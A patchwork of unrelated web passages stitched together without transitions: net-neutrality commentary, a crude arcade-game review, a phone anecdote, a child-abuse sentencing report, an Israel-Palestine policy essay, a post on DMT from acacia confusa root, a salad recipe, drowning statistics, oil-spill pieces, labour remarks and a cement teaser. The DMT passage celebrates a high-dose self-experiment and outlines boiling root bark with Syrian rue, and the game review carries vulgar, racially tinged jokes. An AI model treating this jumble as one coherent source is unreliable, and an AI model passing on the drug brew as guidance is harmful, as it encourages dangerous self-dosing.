Have you guys got some ideas , because frankly , the ideas we are thinking about we are not sure are going to work that well . ' "
This sounds like an excellent approach to problem - solving , though the new Broadband Internet Technical Advisory Group so far includes no public interest advocates .
" Transparency " is one of Verizon 's consensus framework positions , and transparency about congestion issues and other Internet problems is certainly beneficial , so long as some agency like the FCC can serve as a backstop to set at least a few minimum ground rules .
Comcast could have learned the " transparency " lesson a bit earlier .
The FCC noted that Comcast repeatedly " changed its story " when investigated , eventually admitting that its " current P2P management is triggered ... regardless of the level of overall network congestion ... and regardless of the time of day . "
TIME KILLERS
In 1992 , an arcade game was released which was so violent that it upset responsible parents everywhere .
A game where you could rip your opponent 's spinal cord out , punch him in the nuts , or impale him with a spear .
A game that used digitized actors in order to make the violence looks more realistic than it ever had before .
A game that proudly ushered in a new era of video game violence .
That game was called Mortal Kombat .
It kicked ass .
And whenever a game kicks ass , it usually spawns cheap imitators .
Like , say , Time Killers .
Time Killers was also released in 1992 and it's very obvious that the game was thrown together as a quick attempt to cash in on the violence craze that Mortal Kombat spawned .
Let 's compare and contrast :
As you can plainly see , Mortal Kombat had graphics which were state of the art back in 1992 .
Meanwhile , Time Killers looks like a 6th grader 's art class project .
It 's a mean thing to say , but it 's true .
Street Fighter 2 came out almost a full year before Time Killers and it had noticeably better graphics than Time Killers .
This game seriously looks as though someone scanned hand - drawn pictures into a computer and then colored them in using Microsoft Paintbrush .
Sadly , that 's probably not too far off from what they actually did .
The problem is n't simply that the graphics are primitive .
Good graphics do not automatically make a good game .
Halo had great graphics , but that did n't change the fact that it was a stale , repetitive 3D shooter with no real draw .
It had boring characters , boring enemies , boring weapons and a multiplayer mode that can only be described as exceptionally ordinary .
But Halo had the vehicles !!!
Yeah , Halo had vehicles .
Excuse me while I make the universal sign for handjobs .
On the other hand , dated graphics do n't hold back a good game .
Many of the old NES classics still stand the test of time : Super Mario Brothers , Castlevania , Contra , the list goes on and on .
No , the problem with Time Killers is that there 's no subtlety .
The development teams at Midway and Capcom spent lots of time and effort creating detailed backdrops for their characters to fight in .
Ryu and E. Honda are n't fighting in front of a background , they 're fighting in an environment .
It takes many hours of game play before you notice every little thing that 's been put into a Street Fighter level .
There is no such attention to detail in Time Killers .
OK , so the game does n't have great graphics .
The game also does n't have any plot to speak of .
Eight arbitrary champions from throughout history have been pulled out of time and coerced into fighting each other for dominance .
But it could still have interesting characters , right ?
RIGHT ???
Take a look for yourself ...
The caveman .
Every fighting game needs a big slow character who is nearly unplayable .
Thugg is that man .
Thugg is a popular selection among FUCKING IDIOTS .
Thugg big !
Thugg smash !
No , Thugg sucks .
The viking .
The digitized voice on the selection screen pronounces his name " Life " , which once again demonstrates just how half - assed this game was .
Leif is also big and slow , but he is somewhat less slow than Thugg .
This character would have been a lot cooler if it was a hot viking chick instead of a big hairy guy .
The knight .
Wülf tells the other Time Killers that he 's from Camelot , 1202 AD , but he is a fucking poser .
Wülf was born in 1978 in Trenton , New Jersey .
He is the lead singer of a Ronnie James Dio tribute band and he is afraid of spiders .
He bought his sword at King Richard 's Renaissance Faire and it is mostly used for decorative purposes .
The samurai .
Originally they wanted to have a ninja in the game instead of a samurai .
Unfortunately , the guy they hired could only draw samurai , so that 's what they got .
The token black guy .
Christ , I 'm already bored with writing descriptions of these guys .
Orion is one of the fastest characters , but he sucks as a human being .
He 's a pathological liar and he owes me $ 12 .
Last week a friend of mine and I went out for a few beers at a local Belgium Micro - Brewery .
It was around 8:30 - 9 so the late dinner crowd was still out and about .
We decided to belly up to the bar instead of going through the hassle of finding a table .
We order drinks and causally talk to the bartender about the different types of beers they have that week .
People beside us at the bar come and go as their tables open .
I do n’t know about you but whenever I am sitting at a table or bar for that matter , I take my phone out of my pocket at lay it in front of me .
It ’s mainly habit but it ’s a good bet that I ’m also going to have to check a text message , email , or how many NBA players retire with career average double - doubles ( true story ) .
I was just wrapping up my first brew when a man in his mid thirties turns to his girl friend and says , “ I ’ve got to do this .
He has an iPhone . ”
This total stranger then pulls his EVO out and gently , as though he was performing a magic trick lays it on the bar in front of me .
At this point I realize he is talking about me so I look over , smile , and began to prepare myself for what I knew was coming next .
He began to tell me why his new phone was WAY better than my iPhone , the screen is bigger , there ’s a kickstand on the back , he can stream TV , the data plan cost less , and so on .
His girl friend was also stroking the EVO ’s ego ( maybe they should have named it the EGO ) saying that she just got an iPhone a month ago but she really wants an EVO now that she see how “ amazing ” it is .
I politely tried to tell him that that was very cool for him but I prefer the iPhone and that the iPhone 4 is soon coming out and will easily rival the EGO , I mean EVO .
He then said that AT&T does n’t have 4G like Sprint so the downloads wo n’t be as fast .
This is where I stopped listening to him .
I asked him what exactly was Sprint ’s 4G technology ( I knew what it is ) .
He said , “ It has download speeds up to four gig . ”
That is all he said .
He is wrong .
First of all 4G is WiMAX , which is a form of long range Wi -Fi , not a cellular technology .
And it does not have speeds up to 4 gigabits per second , it ’s more like 3 - 6 Mbps which is comparable to AT&T ’s peak 3G coverage .
Oh , and I was also in Indianapolis which does not have Sprint 4G coverage .
So that guy obviously did not know what he was talking about .
So here is my question to you .
Why does having an iPhone put a target on our backs ?
This was not the first time a total stranger has approached me about how his non-iPhone was better than mine .
I have never provoked this from anyone , yet people must feel like me using my phone in front of them is a direct attack , so they must explain themselves .
If you really want to know about the speed of AT&T ’s network compared to Sprint ’s , Verizon ’s , and T - Mobile ’s take a look at this , www.att.com/network/assets/pcworld.pdf
If you want to know more about 4G or as I like to call it WiMAX , check back with the site I am planning on writing an article about it soon .
VN : F [ 1.9.22_1171 ]
Played it ?
Rate it .
please wait ...
Rating : 4.0/5 ( 4 votes cast )
Former Mesa police officer Justin Bowman was sentenced to multiple life prison terms Monday .
Found guilty of 32 counts
A Pinal County Superior judge sentenced Bowman , 31 , after a jury found him guilty June 1 on 32 counts of child molestation , sexual conduct with a minor , sexual exploitation of a minor and furnishing obscene materials to a minor , Pinal County Attorney spokesman Kostas Kalaitzidis said .
Bowman was arrested in 2008 on suspicion of having child pornography on his computer hard drive and committing crimes against two children , a 10 - year - old boy and a 9 - year - old girl .
Prosecutors said Bowman victimized the two children between March 1 and Oct. 29 , 2008 .
Court records indicate the molestation stopped when Bowman 's wife called police to report that he was suicidal .
While at the couple 's Maricopa residence , investigators said they learned Bowman was molesting children inside his home .
Maricopa police said they found child pornography on Bowman 's computer hard drive .
Mesa police records show Bowman was on the verge of being fired when he resigned from the department on Sept. 18 , 2008 .
Bowman offered no reason for his departure in his resignation letter .
The Maricopa Police Department investigated the case with the Department of Public Safety , the Pinal County Sheriff 's Office , Child Help , and the Family Advocacy Center of the Pinal County Attorney 's Office .
There will be no printed or printable program for Doors Open Winnipeg 2020 - all of the most up to date information can be found on this website .
Do n't forget preregistration officially opens Friday , September 4th at noon and is required by most buildings and tours !
But if the two - state solution fails and there are no meaningful alternative plans on the table , the prospect of all - out violence looms .
Secular Palestinian leaders , discredited for failing to deliver statehood , would likely be discarded in favor of extremists .
Meanwhile , Israel might simply opt to impose a border unilaterally , a move that could jeopardize its existing peace treaties with Jordan and Egypt and provoke violent Palestinian resistance .
This would likely take Israel and its neighbors back to the state of on - and - off war that existed during the 1970s .
With Plan
A on life support and a grim future on the horizon , the time has come to consider alternatives , as unorthodox as they may be .
“ Everyone agrees that we are very likely reaching a point where the two - state solution finally becomes impossible , ” says Israeli journalist Dmitry Reider .
“ But they simultaneously refuse to discuss any ideas about what to do once we get there . ”
But the two - state solution has not worked , and there is a growing fear that it never will , despite the resumption last week of indirect talks .
Israel withdrew from the Gaza Strip in 2005 only to see the Islamic fundamentalist party Hamas take control of it , sending rockets into Israeli cities across the border .
Meanwhile , Israel has continued to expand settlements in the West Bank , making the possibility of a territorially contiguous Palestine seem more remote than ever .
With over 300,000 settlers in the West Bank today — compared to just over 100,000 in 1993 — many analysts on both sides believe that the settlements have become too entrenched and inextricably tied to Israel proper for the government to realistically evacuate all or most of its citizens , even if Israeli forces withdraw .
Still , because negotiators on both sides and officials in Washington are so well - versed in two - state diplomacy and have been working for years to bring such a solution about , it remains the default option even as logistics conspire to make it impossible .
It has been almost 17 years since Yasir Arafat and Yitzhak Rabin shook hands in the White House Rose Garden , setting in motion a process that was supposed to end the conflict for good .
The agreement Clinton envisioned was relatively simple : Two states for two peoples .
Israel would largely withdraw from the territories it has occupied since 1967 , while retaining a few large settlement blocs within the West Bank and compensating the Palestinians with a similar amount of land from Israel proper .
This two - state solution respects the fundamental tenets of Zionism — by allowing Israel to remain a Jewish - majority state — and satisfies moderate Palestinians ’ nationalist ambitions by creating a national home for 4 million stateless Palestinians .
It has guided western policy ever since .
“ I think this is a very big deal , ” President Clinton declared to a group of American Jews and Arabs after the legions of photographers left the White House grounds on Sept. 13 , 1993 .
However , Clinton warned , it would take commitment and hard work to guarantee that the historic Israeli - Palestinian Accord signed that day would “ truly be a turning point . ”
Even though that strategy terrifies most Zionists , some notable right - wing Israelis are starting to break the one - state taboo as well .
Likud Party Knesset member Tzipi Hotovely has been pushing for a plan that avoids the evacuation of West Bank settlements , granting Palestinians Israeli citizenship if necessary .
And on April 29 , the Likud Party Knesset speaker Reuven Rivlin told the Greek ambassador that he “ would rather see Palestinians as citizens of this State than partition the land . ”
Support for some kind of single - state solution is growing among Palestinians and even being grudgingly considered by some Israelis .
Although the Palestinian Authority officially remains in favor of two states , Palestinian Authority negotiator Ahmed Qureia suggested as early as 2004 that Palestinians would “ go for a one - state solution in which the Palestinians have the same rights as Israelis ” if the alternative required settling for small noncontiguous pockets of land .
An April poll conducted by An - Najah National University in Nablus revealed that only 28 percent of Palestinians are prepared to accept an independent Palestinian state within the 1967 borders , as envisioned in the two - state model ; many are instead entertaining the idea of demanding voting rights within Israel .
If Barak ’s first scenario comes to pass — a state that is democratic but not Jewish — there would be several possible ways to organize it .
One would be a consociational democracy , a la Switzerland , with autonomy for regional and linguistic minorities and proportional representation of all groups .
Another would be a Belgian - style federation of Jews and Palestinians in which each community has an autonomous government but a strong central government exists to resolve issues affecting both communities .
Or there could be a purely majoritarian democracy : one person , one vote , and a single , centralized government .
The most popular of these alternatives — one country for two peoples — strikes fear into the hearts of Israelis and committed Zionists worldwide .
They have long dreaded the idea of a single state for both the Jews and the Palestinians , for reasons of simple demographics :
If Jews become a minority , the Zionist dream is over .
The Israeli government is acutely aware that if it does not relinquish control over the West Bank and the Palestinian population expands , Jews will eventually become a minority governing over a majority and the “ apartheid ” label that Israel ’s critics have long sought to tag it with will begin to stick .
In February , Defense Minister Ehud Barak presented the dilemma facing Israel in stark terms : “ As long as between the Jordan and the Sea there is only one political entity , named Israel , it will end up being either non-Jewish or non-democratic ....
If the Palestinians vote in elections , it is a binational state ; and if they do n’t vote , it is an apartheid state . ”
Others propose the reverse : allowing Israeli settlers to stay in Palestine .
There would be two states , but no one would be required to move when the borders are drawn ; the settlers could simply become minority citizens of the new state .
Permitting settlers to remain in West Bank enclaves — even if those areas become part of Palestine — would allow Israel to avoid that drama of uprooting its own citizens from their homes .
Many Palestinians bristle at the notion of rewarding Israel for decades of settlement expansion , which they regard as illegal .
These moral objections notwithstanding , high - level Palestinian officials are taking the idea seriously .
Qureia , the lead Palestinian negotiator , has explicitly proposed such an arrangement .
He told the Israeli daily Haaretz in 2009 , “ Those residents of Ma’aleh Adumim or Ariel who would rather stay in their homes could live under Palestinian rule and law , just like the Israeli Arabs who live among you .
They could hold Palestinian and Israeli nationalities .
If they want it — welcome . ”
An even more radical idea has been put forward by Swedish diplomat Mathias Mossberg and UC - Irvine professor Mark LeVine .
They do not believe giving settlers Palestinian passports would solve anything .
The two propose creating overlapping states between the Jordan River and Mediterranean Sea , delinking the concept of state sovereignty from a specific territory .
There would be an Israel and a Palestine , but rather than divide the land , the two states would be superimposed on top of one another .
The plan would permit individuals to live where they wish and choose their political allegiance .
This , they argue , would resolve the seemingly intractable questions of how to divide the holy city of Jerusalem and whether to allow Palestinian refugees “ the right of return ” to their old communities .
It is a creative and theoretically attractive solution because it does n’t require forcing people from their homes or drawing new borders .
However , their plan overlooks the near - total lack of trust between the two communities and is vague on the maddeningly complicated questions of jurisdiction that would arise , for example , in the case of a crimes involving both Israelis and Palestinians .
Former US ambassador to Israel Daniel Kurtzer regards the idea as a waste of time , arguing : “ This is not a conflict where untried experiments in political science should be tried on the ground . ”
With the two - state solution on life support and the Palestinian Authority and Hamas still at odds in their respective fiefdoms , Israeli government officials are contemplating a three - state model .
The plan would essentially formalize the current status quo of a Hamas - ruled Gaza , a nominal Palestinian Authority state in most of the West Bank , and Israel within its 1967 borders plus a few annexed settlement blocs .
James Zogby of the Arab - American Institute insists that this would never be sustainable because Palestinians would not allow Gaza to remain “ a reservation of poverty , despair , and anger . ”
Still , with no sign of a reconciliation between Hamas and the Palestinian Authority , and the refusal of Hamas to acknowledge Israel ’s right to exist , some in the Israeli government believe maintaining the status quo is the easiest option .
Last week , Israelis and Palestinians resumed so - called proximity talks , with American mediators shuttling back and forth because the two parties will not meet each other face - to - face .
None of these ideas will likely be on the agenda .
The United States is still a firm believer in the peace process , and the two - state solution remains an article of faith in Washington and among regional experts .
But as facts on the ground gradually extinguish the possibility of a two - state deal , the unorthodox options deserve consideration , if only as a glimpse into what the future may hold .
Moreover , the specter of a one - state solution could soon be invoked as a threat in negotiations if Palestinians do not see a viable independent state on the horizon .
Meanwhile , officials like Barak , who warn ominously that Israel will sink into apartheid , are doing little to encourage the territorial concessions necessary to steer Israel away from that perilous course .
Pleased with a booming economy and an absence of suicide bombings , the Israeli government appears to be in no rush to seal a comprehensive deal , believing that the status quo can hold for several years .
But not forever .
Ironically , when that time comes , the Israeli officials who talk of three states as a stopgap measure and claim they are working to create two coexisting side - by - side in peace and harmony , could soon find themselves left with only one — the scenario they have always dreaded .
Sasha Polakow - Suransky is a senior editor at Foreign Affairs and author of ” The Unspoken Alliance : Israel ’s Secret Relationship with Apartheid South Africa . ”
© Copyright 2010 Globe Newspaper Company .
A group in Taiwan has discovered that the roots of acacia confusa are a very highly active DMT source .
K. Trout had pointed this out in his books , but no bioassays were really available on this particular plant until now .
Acacia confusa root can not only be worked with in conjunction with Syrian rue or caapi , but it can be used alone as has been discovered recently on the DMT nexus forum by a brave explorer .
The brave psychonaught reportedly drank 5 table spoons of root made into a light tea by itself , no betacarbolines added .
He was then thrust into a very difficult and high dosage DMT journey .
The roots of the plant are active and very powerful .
Remarkably Acacia Confusa has one of the highest yeilds of DMT discovered in nature .
That it is active with out the addition of a harmala alkaloid is amazing , and reminiscent of reports of cold water extracted Jurema or mimosa hostilus root bark , which has been a real hit or miss in bioassays .
There are also reports that Confusa may have a traditional history of use as an entheogen by the original peoples of Taiwan .
Today it is currently used in Chinese medicine with whispers that the old herbalists know that it can take one to another world .
The organization in Taiwan that leads ceremonies wrote a nice report on an acacia confusa ayahuasca analog recipe .
According to reports the recipe utilized stem bark in the brew instead of root bark , the stem bark being much weaker in content .
Acacia_confusa
Bioassay on Acacia confusa experiment
Face Book Group In Taiwan
Chinahuasca recipe published via Scribd …
Quote from Taiwan chinahuasca brewer to Mindbody …
“ I introduced it to Taiwan after my friend telling me about it while I
was living on Orchid Island .
We found a tree scraped off some of the
root bark , boiled it for a couple of hours with some Syrian Rue and a
few kiwis .
That ’s how it began .
The second time I took it , I was told to
move to Tainan on the west coast of Taiwan and start using it as
therapy to help people change their lives . ”
~ Who can ignore such a message ?
Image , “ Just Catching ” by elif ayse on Flickr courtesy of Creative Commons Licensing .
Although you might normally think of root vegetables as fall crops , many varieties are also available in the late spring .
Beets and carrots , for instance , grow well in the cooler temperatures of spring .
These cool - weather crops are typically planted in the early spring for a late spring / early summer harvest and again in the late summer for a fall harvest .
They do poorly in mid-summer heat .
So , unless you want to wait until fall , now is the time to look for beets and carrots at your local farmers market !
Beets are nutritional powerhouses , with high levels of folate , manganese , and potassium .
Carrots are chock - full of carotenoids , a group of compounds that are essential for the body ’s maintenance of skin , teeth , and the immune system .
Put the two together in a raw salad and you ’ll have one nutritious ( and delicious ) meal .
Here ’s one of my favorite beet and carrot recipes , a Raw Vegan Beet Salad with Carrot and Ginger .
It ’s sweet , earthy , and delightfully crunchy .
This recipe is adapted from Mark Bittman ‘s How to Cook Everything .
1/2 pound small beets without their greens ( which , by the way , you should not throw away or have chopped off at the farmers market – beet greens are delicious ! )
1/2 pound carrots
2 large shallots , minced
Sea salt and freshly ground black pepper
2 teaspoons Dijon mustard
1 tablespoon peanut oil
2 tablespoons lime juice
1 tablespoon minced ginger
1/4 cup chopped fresh cilantro
[ social_buttons ]
1. Grate the beets and the carrots by hand or use a food processor fitted with a grating disk .
Combine the grated beets and carrots with the shallots and ginger in a bowl .
2. Sprinkle the salad with salt and pepper .
Whisk together the mustard , oil , and lime juice in a small bowl and add to the salad .
Toss the salad to coat with the dressing .
Taste and adjust the seasoning as necessary .
Toss in the cilantro and serve .
Serves 4 .
Image courtesy of heathervescent via a Creative Commons license .
June 20 , 2010  --
Monday marks the official start of summer , which , for many Americans , means visits to the pool or trips to the beach .
But the American Academy of Pediatrics is urging caution when it comes to summer splashing .
Drowning is the second leading cause of unintentional injury - related death for those younger than 19 and can be prevented , the group says .
One demographic in particular , African - Americans , is threatened by the statistic .
Black children drown at a rate more than three times that of white children .
While 40 percent of white children were found to have low or no swimming ability , the same was true for nearly 70 percent of African - American children , a USA Swimming survey finds .
Latino children also lag in their swimming level , with 58 percent at low or no swimming ability .
African - American children with parents who themselves do not know how to swim are less likely to know or to be encouraged to learn how .
And , as for why African - Americans show less of a proclivity for swimming , several reasons are apparently to blame .
African - Americans say that a lack of access to pools , the expense of swimming lessons and the idea that recreational swimming is a culturally white activity are factors that inhibit them from learning how to swim , according to the study , which was commissioned by the national governing body of competitive swimming USA Swimming and released last month .
The most common reason cited by African - Americans for not knowing how to swim , however , was a fear of drowning .
The study was conducted by the University of Memphis between Feb. 1 , 2010 , and May 26 , 2010 , and surveyed more than 2,000 children and parents at YMCAs in six cities across the United States : Atlanta , Boston , Denver , Memphis , Minneapolis and San Diego .
" We were awestruck by the focus group participants ' stories , which revealed how deeply rooted the ' fear factor ' is embedded , " said Richard Irwin , who led the team of researchers together with his wife , Carol Irwin .
" Using solutions outlined by our focus groups and some minority swimming programs already in place , we can positively affect the ... drowning rates , and infuse the sport of swimming with much needed diversity , " Carol Irwin said .
Even Toddlers Can Benefit From Swim Lessons
The end to this potentially deadly cycle lies in parents taking precautionary action and making sure their children know how to swim , according to the American Academy of Pediatrics .
The group recommends that parents watch children at all times when in or near a pool and that parents take other measures such as installing protective fences to ensure their children 's safety .
And the academy has concluded separately that younger children may benefit from swimming classes , a reversal of its earlier position that recommended against such lessons for toddlers .
New data suggested that early swim training may actually lower drowning rates in children under the age of 4 .
Because there is no evidence that such training can do harm , the group said it revised its position .
The organization had recommended for years against swimming lessons for children between the ages of 1 and 3 years old .
" We 're no longer against swimming lessons for these younger kids , but we 're certainly not saying that everybody needs to rush out and get their kids swimming lessons , " Dr. Jeffrey Weiss , the lead author of the Academy of Pediatrics ' Policy Statement on Drowning Prevention and pediatric hospitalist at Phoenix Children 's Hospital in Arizona , told " Good Morning America . "
ABC News ' Suzan Clarke and Sabrina Parise contributed to this story .
How high the liability cap ?
By Kate Sheppard
There 's growing frustration about the administration 's response to the oil spill in the Gulf of Mexico , with complaints that officials have been sluggish in demanding BP be more transparent and hesitant to criticize the company 's inability to plug the well .
The administration clearly faces a number of tough choices here with few right answers , but there 's one area where it could be weighing in on specifics but have n't : the liability cap on oil spills .
An effort is underway in the Senate to raise the liability cap to $ 10 billion .
This would be significantly higher than the current cap of $ 75 million , set under the Oil Pollution Act of 1990 , though it still might still be well below the estimated $ 14 billion in costs anticipated in the gulf spill .
Senate Democrats have tried twice to bring up the measure under unanimous consent but were twice blocked -- first by Lisa Murkowski ( R - Alaska ) and then by James Inhofe ( R - Okla . ) .
Both Republicans offered the same argument :
Too high of a cap would keep smaller , " independent " oil companies from entering the marketplace .
The idea that a company should be able to drill and potentially cause problems that it can't afford to fix should register as patently ridiculous .
But then Obama 's own interior secretary , Ken Salazar , essentially agreed with them .
" You do n’t want only the BPs of the world to be involved in these operations , " said Salazar in a Senate hearing last week .
Robert Menendez ( D - N.J. ) , a co-sponsor of the bill to raise the limit , was clearly taken aback by the suggestion : " That simply means if you 're smaller you can get away with taking the same risk and having less liability . "
The same day , Majority Leader Harry Reid suggested that perhaps there should be no upper limit on the amount oil companies are forced to pay out .
Shortly thereafter , Obama tried to defuse the conflict , issuing a statement calling on Republicans to stop blocking the bill .
But he did not offer a figure for how high he thought it should be .
Even yesterday , press secretary Robert Gibbs did n't offer a figure , only noting that it should be raised " to a place that would ensure that the economic damages " are covered .
The administration has been very clear that it expects BP to cover all costs related to the spill .
" BP will pay for every bit of this , " Gibbs reaffirmed Sunday .
But raising the liability cap would serve to both reinforce that and deter future risky drilling .
Some concrete direction from the White House on the oil spill liability would be a good place to start asserting some direct political pressure .
Kate Sheppard covers energy and environmental politics in Mother Jones 's Washington bureau .
For more of her stories , see here , and you can follow her on Twitter here .
CLEVELAND –
In speeches here last week AFL - CIO President Rich Trumka attacked right - wing efforts to use the federal budget deficit as an excuse to block programs needed to end the economic crisis .
“ The United States does not have a short - term debt problem , ” Trumka stressed at a town hall meeting Thursday sponsored by the North Shore AFL - CIO and in a speech Friday at the City Club .
“ It has a short - term jobs crisis .
We may have a mid-term or long - term deficit problem that we can get to .
But now is not the time to go on an austerity program and kick us back into a recession .
That is a bad policy that will lead us to disaster . ”
He blasted the Senate Republicans and some Democrats who have used the deficit as an excuse and voted to deny extending benefits to the long - term unemployed ,
“ There are six and half million long - term unemployed , ” Trumka said .
“ If they suddenly stop spending it would be a huge broadside hit to the economy .
We cannot grow our way out of deficit by getting smaller . ”
The current recovery , he said , is “ very fragile . ”
Trumka cited the example of Japan , which he said for 10 years during the 1990s kept initiating stimulus programs and then pulling back .
“ Their economy stalled , ” Trumka said .
“ They call it the lost decade .
We cannot afford a lost decade in the United States . ”
“ There is no recovery until we fill the 11 million job hole created since the recession began , ” he declared .
Real unemployment in the U.S. , he said , is 25 million , if part - time and discouraged workers are counted .
The AFL - CIO has put forward a far - reaching program to address the crisis .
The program includes rebuilding the nation ’s infrastructure , aiding state and local governments to maintain jobs and services , public jobs programs in hard - hit communities , using funds paid back in the Wall Street bailout to help local banks , as well as extending benefits to the unemployed .
Wall Street is mounting “ massive resistance ” to such programs , Trumka said , noting , “ There are four lobbyists for every member of Congress ” fighting regulation of the financial industry which caused the crisis .
Trumka also issued a stern warning about the National Commission on Fiscal Responsibility and Reform , which is to issue a report in December and is considering recommending cuts in Social Security and Medicare .
Fourteen of the 18 members appointed by the Obama administration are “ fiscal conservatives , ” Trumka said .
“ Social Security is the most successful anti-poverty program in history , ” he said .
Social Security is not part of the federal budget and has no effect on the deficit .
Commission members , he said , say cutting Social Security is a way of showing bond - holders that Democrats are ready to make sacrifices , but , Trumka said , cutting the program , either by raising the retirement age or reducing benefits , is “ playing with dynamite . ”
Social Security , he said , will have no solvency problem for decades and then it can be easily fixed by raising the “ cap ” – the maximum income that is taxed – now set at $ 106,800 .
“ We believe that every American should be able to retire with 70 percent of their take - home pay , ” Trumka said .
“ And for low - income people , it should be higher . ”
Photo : AFL -CIO
http://www.flickr.com/photos/labor2008/4543021437/ cc 2.0
Wes and Tony have a comic here today even though the internet has been canceled .
This is my draft proposal for constructing a grassroots egalitarian socio-economic community system .
It is in its first draft stage and requires extensive debate in order to : determine the strengths and weaknesses ; assess feasibility of implementation ; revise according to what people actually want to work on ; and so on , to set us up for success .
While some seek confrontation with the most powerful institutions of the day , I do n’t see the benefit .
This proposal is my non-violent anti-confrontational reaction to the sad lack of real community organization that exists in the United States at present .
Instead of waiting around for the Glorious Revolution , we must first get to the point where people understand the values necessary to move past tyranny .
I believe this is the ticket .
Please read the attached document and let me know what you think .
This needs to be debated and discussed and , if popular , implemented .
All power is illusory , so we have nothing to lose through parallel institutional creation .
Let ’s escape the narrow path to darkness that we ’re always being ushered toward and find our own way .
Alternative - Community - Building
Share this : Twitter
Facebook
Like this : Like Loading ...
Yes , oil spills are terrible .
But the truth is they 're not the calamity doom - mongers say they are
A few names stand out as symbols of Man ’s profligacy and carelessness in the environmental hall of infamy .
These must include Torrey Canyon , Amoco Cadiz and Exxon Valdez — huge oil spills that led not to massive loss of human life , but , we are told , to ecological destruction on a scale never before seen .
To this list we must now add ‘ Deepwater Horizon ’ , the huge BP drilling platform in the Gulf of Mexico which exploded on April 20 .
Vast : Oil leaking from BP's Deepwater Horizon rig in the Gulf of Mexico
Since then , around 10 - 12 million litres of crude oil have been gushing every day from the broken wellhead , a mile down on the seafloor .
Despairing environmentalists , together with politicians and scientists , say that this has led to the greatest ecological disaster in U.S. history with thousands of tonnes of oil set to ruin the pristine shores of the Gulf , kill millions of seabirds , fish and marine mammals , and decimate the lucrative fishing industries of America ’s swampy underbelly .
Already , green campaigners have pointed to the spill as yet another sign that modern Man ’s dependency on oil amounts to a Faustian pact with an evil subterranean devil ; not only does oil wreck our climate when it is burned , releasing warming carbon dioxide into the atmosphere , its very substance amounts to a prehistoric poison unleashed by our demonic technologies .
But the truth is that when it comes to oil spills — and other environmental disasters — history tells us something very puzzling and counter - intuitive .
Despite the appalling pictures beamed onto our screens — the oil - covered seabirds , the grim tides of dead fish , the blackened beaches and disgusting oozing mess at the water ’s edge —
Nature has seen that , usually within a year or two or even less , places affected by oil spills have returned more or less to normal , the disaster forgotten .
Indeed , many experts now believe that if left to run their natural course , it is likely that the effects of even the worst disasters are nullified .
How can this be ?
Are oil spills really less bad than we have been led to believe ?
Certainly , our attempts to deal with them can often cause far more havoc and destruction than the spills themselves .
In March 1967 , the oil tanker Torrey Canyon ran aground off the Scilly Isles en route from the Gulf to Milford Haven .
As the ship foundered and started to break up with its 120,000 tonnes of crude leaking into the Atlantic , the world faced its first major oil - spill disaster .
A huge slick was heading for the holiday beaches of Cornwall .
First , the RAF bombed the stricken tanker , in an effort to burn off the oil .
Most of the bombs missed and the effect was to accelerate the rate at which oil leaked into the sea .
Next , 10,000 tonnes of industrial - strength detergents were sprayed on the oil by teams on 42 ships in an effort to disperse it all .
These chemicals had little effect on the slick , but they poisoned millions of marine organisms and probably caused far more damage to the ecosystem than the oil itself .
At one point , huge drums of detergent were simply poured onto the beaches around Land ’s End in the hope that , should the oil wash ashore , this would keep the sands clean .
At Sennen Cove , huge quantities of solvent were ploughed into the sand — meaning that the oil was held in situ for months .
There is no doubt that the oil from the Torrey Canyon was toxic and killed a lot of animals ,
as well as being unsightly .
But experts are now convinced that the best solution , short of pumping the oil off the tanker before it could escape or otherwise trying to contain it , would have simply been to do nothing .
Disaster :
This image taken by a NASA satellite shows the oil spill perilously close to the U.S. coastline
According to Dr Simon Boxall , an oceanographer and oil - spill expert at Southampton University : ‘ Crude oil is a natural product ( being rotting vegetation — albeit modified by age and pressure ) and in the environment breaks down naturally through bacterial decay . ’
In fact , thousands of tonnes of crude oil , far more than is spilled as a result of man-made disasters , seeps from the seabed naturally every year .
The main difference with a ship or oil well disaster is its suddenness and localised nature .
Of course , there is nothing good about an oil spill .
If one happens near land , then not only are marine ecosystems threatened but also the fragile coastal ecologies upon which thousands may depend for their livelihood .
The most obvious short - term threat is to tourism ; no one wants to lie on a beach sticky with a layer of tar and swim in a sea shining with the telltale rainbow iridescence of floating oil .
Oil spills can kill marine organisms in their millions , and can have a devastating effect on fragile ecosystems such as coral reefs and mangrove swamps .
Modern dispersant chemicals are far gentler and more effective than those used in the Torrey Canyon disaster .
But the good news is that these disasters ARE short - term .
The environment will recover .
And the speed with which it does so depends on the grade of the oil , how much was spilt , the sea temperature , the amount of sunlight , tidal mixing and wave conditions .
Slick : Rust - coloured oil debris floats on the water at the mouth of the Mississippi Delta , left , while thick oil is scooped up with a net at Pass a Loutre , Louisiana
What is astonishing is that in most cases , complete recovery takes less than two years .
For example , in December 1999 , the MV Erika sank in the Bay of Biscay , and within days a huge oil slick washed up on the beaches of southern Brittany .
News reports showed heartrending pictures of stricken seals as thousands of volunteers battled to clear up the mess .
But despite predictions that the Brittany coast would be ruined for years , the fact was that by the following summer most of the oil had been effectively dispersed and there was certainly no sign of any oil on the beaches when I had a family holiday there less than two years later .
Even more strikingly , when the Braer ran aground off Shetland in 1993 , there were widespread predictions of an environmental catastrophe .
Some reports suggested that seabird populations could be decimated for 70 years .
In fact , gale - force winds combined with the fact the spill consisted of a very light crude so that , apart from a few hundred affected birds ( and some badly - oiled sheep ) , the environmental effects were so minor that , in the words of marine Biologist Prof Chris Frid of Liverpool University , ‘ they were hard to measure ’ .
Crude oil is a mix of natural hydrocarbons , from light spirits to thick tars .
The light oil tends to evaporate quickly and the thicker stuff can be ‘ digested ’ by marine microbes quite efficiently .
In open oceans , even a large spill will disperse in a few weeks .
Closer to shore , there is plenty we can do but we should not overreact .
Oiled seabirds are heartwrenching ( and make great TV ) but in reality their numbers tend not to be great — birds simply tend to fly away from polluted sea .
Of course , our society depends on oil ; until an alternative can be found , it would be foolish to pretend otherwise and in this sense we are all to blame for the Louisiana spill .
Understandably , people living on the Gulf Coast are fearful ( and , it must be said , keen to obtain any compensation that may be on offer ) .
But the fact is these accidents will happen .
And the lessons from Nature is that whatever happens from now on , in a couple of years ’ time , the silver sands of Florida ’s Gulf Coast will be as pristine as they were before the spill .
The new face of clean technology ( Image : Foto24 / Gallo Images / Getty Images )
Green machine is our new weekly column on the latest advances in environmental technologies
As far as clean technologies go , a dollop of cement sounds unlikely to be at the cutting edge .
And with good reason : cement production accounts for 5 per cent of global carbon emissions .
So it follows that better building materials could go a long way towards cleaning up the atmosphere .
Today companies around the world are vying to be the first to commercialise cements that can be made either by absorbing more than their production generates , or without emitting carbon dioxide at all .
Advertisement
